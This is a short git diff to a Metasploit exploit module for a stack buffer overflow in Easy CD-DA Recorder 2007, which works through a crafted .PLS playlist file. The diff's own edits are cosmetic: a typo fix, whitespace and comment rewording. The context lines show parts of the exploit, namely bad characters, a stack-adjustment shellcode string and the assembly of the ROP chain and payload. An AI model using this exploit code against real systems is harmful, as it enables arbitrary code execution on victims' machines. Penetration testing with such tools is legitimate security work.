diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb index 5bc71a3ef8..2696aa5ac2 100644 --- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb +++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb @@ -14,11 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow', 'Description' => %q{ - This module exploits a stack-based buffer overflow vulnerability in + This module exploits a stack-based buffer overflow vulnerability in Easy CD-DA Recorder 2007, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .PLS file, a remote attacker could execute arbitrary code on the system or cause - the application to crash. This modules has been tested successfully on + the application to crash. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => true, 'BadChars' => "\x0a\x3d", 'Space' => 2454, - 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500 }, 'Targets' => [ @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << rop_nops(8) sploit << rop_gadgets sploit << payload.encoded - sploit << rand_text_alpha_upper(10000) # make it crash + sploit << rand_text_alpha_upper(10000) # Generate exception # Create the file print_status("Creating '#{datastore['FILENAME']}' file ...")